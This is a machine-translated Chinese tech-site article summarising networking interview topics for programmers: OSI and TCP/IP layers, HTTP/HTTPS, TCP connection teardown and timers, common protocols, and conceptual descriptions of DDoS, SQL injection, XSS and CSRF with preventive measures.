Shulou(Shulou.com)06/03 Report--

This article mainly explains "as a programmer needs to know the foundation of the network". The content of the explanation in the article is simple and clear, and it is easy to learn and understand. let's study and learn "what are the basics of the network as a programmer?"

During the interview, I am often asked about the knowledge of computer network, so I plan to write a blog to summarize some basic points of computer network and the test sites often asked in the interview. If there are any errors in the document, you are welcome to point out that you can have any supplementary private messages. I will add them from time to time. Without saying much, go straight to the subject:

1.OSI network architecture and TCP/IP protocol architecture

The OSI network architecture is divided into seven layers:

From bottom to top, it is divided into physical layer, data link layer, network layer, transport layer, session layer, presentation layer and application layer.

The TCP/IP protocol structure is divided into four layers:

From bottom to top, it is divided into network interface layer, internetwork layer, transport layer and application layer.

The network interface layer corresponds to the physical layer and data link layer of OSI, and the application layer corresponds to the session layer, presentation layer and application layer of OSI.

2.HTTP and HTTPS protocols

Http protocol runs on TCP, plaintext transmission, client and server can not verify each other's identity; Https is a Http dressed in SSL (Secure Socket Layer) shell, runs on SSL, SSL runs on TCP, is a HTTP with encryption and authentication mechanism. There are the following differences between the two:

Different ports: Http and Http use different connection methods and different ports. The former is 80 and the latter is 443.

Resource consumption: compared with HTTP communication, Https communication consumes more CPU and memory resources due to encryption and decryption

Cost: certificates are required for Https communications, and certificates generally need to be purchased from a certification authority

The encryption mechanism of Https is a hybrid encryption mechanism of shared key encryption and public key encryption.

HTTP protocol format

Http requests partial data of the protocol

GET / user HTTP/1.1Host: localhost:8080Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9...

Part I: request line: request type, resource path, and http version (first line above)

Part II: request header: immediately after the request line, used to describe the additional information that the server needs to use (lines 2 to 8)

The third part: blank line (there must be a line break between the request header and the body)

Part IV: body data, you can add any data

Http response protocol

HTTP/1.1 200Content-Type:text/htmlOK

Part one: status line, http version, status code, status information (first line)

The second part: response message header, indicating the additional information that the server needs to use (second line)

Part III: blank line (third line)

Part IV: response text (line 4)

3.TCP protocol and UDP protocol

TCP is a transport layer protocol, and TCP provides reliable connections to data through connection-oriented, end-to-end, and reliable byte streaming services.

UDP is a transport layer protocol, UDP will not establish a connection before data transmission, can not guarantee the reliability of the data connection, and the transmission speed is fast.

Three-way handshake and four waving of 4.TCP protocol

First wave: the client process sends a connection release message and stops sending data. Release the header of the data message, FIN=1, whose sequence number is seq=u (equal to the sequence number of the last byte of the previously transmitted data plus 1), and the client enters the FIN-WAIT-1 (termination waiting for 1) state. TCP stipulates that FIN message segments consume a serial number even if they do not carry data.

The second wave: the server receives the connection release message, sends out a confirmation message, ACK=1,ack=u+1, and takes its own serial number seq=v. At this time, the server enters the CLOSE-WAIT (shutdown waiting) state. When the TCP server notifies the high-level application process, the direction of the client to the server is released, and it is in a semi-closed state, that is, the client has no data to send, but if the server sends data, the client still has to accept it. This state will continue for a while, that is, the duration of the entire CLOSE-WAIT state. After the client receives the confirmation request from the server, the client enters the FIN-WAIT-2 (termination waiting 2) state and waits for the server to send the connection release message (before that, it needs to accept the last data sent by the server).

The third wave: after the server sends the final data, it sends the connection release message to the client, FIN=1,ack=u+1. Because the server is in a semi-closed state, the server probably sends some more data, assuming that the sequence number at this time is seq=w. At this time, the server enters the LAST-ACK (final acknowledgement) state, waiting for the client to confirm.

The fourth wave: after receiving the connection release message from the server, the client must issue an acknowledgement, ACK=1,ack=w+1, and its serial number is seq=u+1. At this time, the client enters the TIME-WAIT state. Note that the TCP connection has not been released at this time. The time of 2 ∗∗ MSL (maximum message segment life) has elapsed, and the client will not enter the CLOSED state until the corresponding TCB is revoked. As soon as the server receives the confirmation from the client, it immediately enters the CLOSED state. Similarly, after revoking the TCB, the TCP connection is terminated. As you can see, the server ends the TCP connection earlier than the client.

4.1 Why is it a three-way handshake when connecting and four waving when it is closed

Because when the Server side receives the SYN connection request message from the client side, it can send the SYN+ACK message directly. The ACK message is used to reply, and the SYN message is used to synchronize. However, when the connection is closed, when the Server side receives the FIN message, it is likely that the SOCKET will not be closed immediately, so it can only reply an ACK message first, telling the client, "I received the FIN message you sent." Only when all the messages on my Server side have been sent, can I send FIN messages, so I can't send them together. So you need a four-step handshake.

4.2 Why does the TIME_WAIT state need to go through 2MSL (maximum segment lifetime) to return to the CLOSE state?

Although according to reason, after all four messages have been sent, we can directly enter the CLOSE state, but we must pretend that the network is unreliable and the last ACK may be lost. So TIME_WAIT status is used to resend ACK messages that may be lost. The last ACK reply is sent at Client, but the ACK may be lost. If Server does not receive the ACK, it will send the FIN fragment repeatedly. So the Client cannot be shut down immediately, it must confirm that the Server received the ACK. Client will enter the TIME_WAIT state after sending out the ACK. Client sets a timer to wait for 2MSL. If the FIN is received again within that time, Client will resend the ACK and wait for the 2MSL again. The so-called 2MSL is twice as much MSL (Maximum Segment Lifetime). MSL refers to the maximum survival time of a segment in the network, and 2MSL is the maximum time it takes for a send and a reply. If the FIN is not received by the 2MSLJE client again, then the Client infers that the ACK has been successfully received and ends the TCP connection.

4.3 Why use three handshakes instead of two or four?

The three-way handshake performs two important functions, both to be ready to send data (both parties know they are ready for each other) and to allow both parties to negotiate the initial serial number, which is sent and confirmed during the handshake.

Now change the three-way handshake to only two handshakes. When the client does not receive the request after the second handshake (that is, the server sends it to the client), the server will think that the connection has been established and start sending data. However, if the client does not receive the connection request, it will think that the connection has not been established and continue to send connection information. This leads to a deadlock.

As for why it is not changed to four times, after three connections, both the server and the client can determine the previous communication, but cannot confirm the situation after that, and a reliable communication protocol does not exist at all, so it is futile to add it again.

4.4 what if a connection has been established but the client suddenly fails?

TCP also has a survival timer, obviously, if the client fails, the server can not wait forever, wasting resources. The server resets the timer every time it receives a request from the client. The time is usually set to 2 hours. If no data from the client is received in two hours, the server will send a probe message segment, and then send it every 75 seconds. If 10 probe messages are sent in a row and still do not respond, the server thinks that the client has failed and then closes the connection.

5. What are the common network protocols?

Network layer

IP protocol: Internet protocol

ICMP protocol: Internet control message protocol

ARP protocol: address resolution protocol

RARP protocol: inverse address resolution protocol

Transport layer

UDP protocol: user Datagram protocol

TCP protocol: transmission control protocol

Application layer

FTP: file transfer protocol

Telenet: remote login protocol

DNS: domain name resolution protocol

POP3: post Office Protocol

HTTP protocol: hypertext transfer protocol

SMTP: simple Mail transfer Protocol

SNMP: simple Network Management Protocol

TFTP: simple File transfer Protocol

6. What are the common cyber attacks? And preventive measures 6.1 DDoS

DDoS attack

The full name of DDoS is Distributed Denial of Service, which means "distributed denial of service" in Chinese, which means that a large number of legitimate distributed servers are used to send requests to the target, resulting in normal legitimate users unable to get services.

Common attacks such as TCP attacks:

The client sends a request link packet to the server

The server sends an acknowledgement packet to the client

The client does not send an acknowledgement packet to the server, and the server has been waiting for an acknowledgment from the client.

DDoS prevention

Limit the number of SYN semi-links opened at the same time

Shortening the Time out time of SYN semi-links

Turn off unnecessary services

6.2 SQL injection

SQL injection

Instead of submitting standard data to text boxes or other data entry fields, attackers enter SQL statements to trick applications into displaying or manipulating their data.

Preventive measures of SQL injection

Do not use dynamic SQL

Do not keep sensitive data in plain text.

Restrict database permissions and privileges

Avoid displaying database errors directly to the user

Use Web Application Firewall (WAF) for Web applications that access the database

Periodically test Web applications that interact with the database

Update the database to the latest available patch

6.3 XSS attack

XSS attack

XSS attacks, or cross-site scripting attacks (Cross Site Scripting), are common vulnerabilities in web programs. An attacker destroys a vulnerable website or Web application and injects malicious code. When the page loads, the code executes a malicious script on the user's browser.

XSS prevention

Web page user input place, the input data escape, filter processing. When you output a page in the background, you also need to escape and filter the output (because an attacker may write malicious scripts to the database in other ways)

The front end verifies the places where html tag attributes and css attributes are assigned.

6.4 CSRF attack

CSRF attack

Cross-site request forgery (English: Cross-site request forgery) is an attack method that hijacks a user to perform unintended operations on a currently logged-in Web application.

CSRF prevention

Check the Referer field

There is a Referer field in the HTTP header that indicates which address the request came from. When processing sensitive data requests, generally speaking, the Referer field should be under the same domain name as the requested address. In the bank operation above, for example, the Referer field address should usually be the web address where the transfer button is located, which should also be under www.examplebank.com. If it is a request from a CSRF attack, the Referer field will be the address that contains the malicious URL and will not be under www.examplebank.com, so the server will be able to identify the malicious access.

Add check token

Since the essence of CSRF is that the attacker deceives the user into accessing the address he has set, if the user's browser is required to provide data that is not stored in cookie and cannot be forged as a check when accessing sensitive data, the attacker can no longer run the CSRF attack. This data is usually a data item in a form. The server generates it and appends it to the form, and its content is a pseudo-random number. When the client submits a request through the form, the pseudo-random number is also submitted for verification. During normal access, the client browser can correctly get and return the pseudorandom number, but in the deceptive attack sent through CSRF, the attacker does not know the value of the pseudorandom number in advance, and the server will reject the suspicious request because the value of token is null or incorrect.

The sticky packet problem of 7.TCP Protocol

TCP is a connection-oriented and stream-oriented reliable protocol. In order to send multiple packets to the receiver more effectively, the sender uses an optimization method (Nagle algorithm) to merge the data with small intervals into a large data block, and then encapsulate the packets. In this way, the receiver, it is difficult to distinguish, there will be the so-called sticky packet problem.

The reason for the sticky package:

(1) the sender needs to wait for the buffer to be full before it is sent out, resulting in sticky packets (the interval between sending data is very short, the data is very small, and the data will come together to produce sticky packets)

(2) the receiver does not receive the packets in the buffer in time, resulting in multiple packets to be received (the client sends a piece of data, the server receives only a small part of it, and the server still takes the data left over from the buffer next time, resulting in sticky packets)

Sticky package solution:

(1) fixed length transmission

When sending data, a fixed-length design is adopted, and no matter how large the data packet is, it is divided into fixed length to be sent. The disadvantage of this method is that the length of the last packet is often filled with blanks. The receiver may not be able to identify the invalid part.

(2) set the mark on the tail.

Add a special mark at the end of a packet, and when the receiver reads the tag, it means that the packet has been read. The disadvantage of this approach is that it is difficult to find the right answer to what kind of data is taken as the flag bit.

(3) add a tag to the header to indicate the length of the packet

Mark a length in the header and read this length before accepting the data, so you don't have to worry about packet loss.

Thank you for your reading, the above is the content of "as a programmer needs to know the basis of the network", after the study of this article, I believe you need to understand the basis of the network as a programmer has a deeper understanding of this problem, the specific use of the need for practice to verify. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.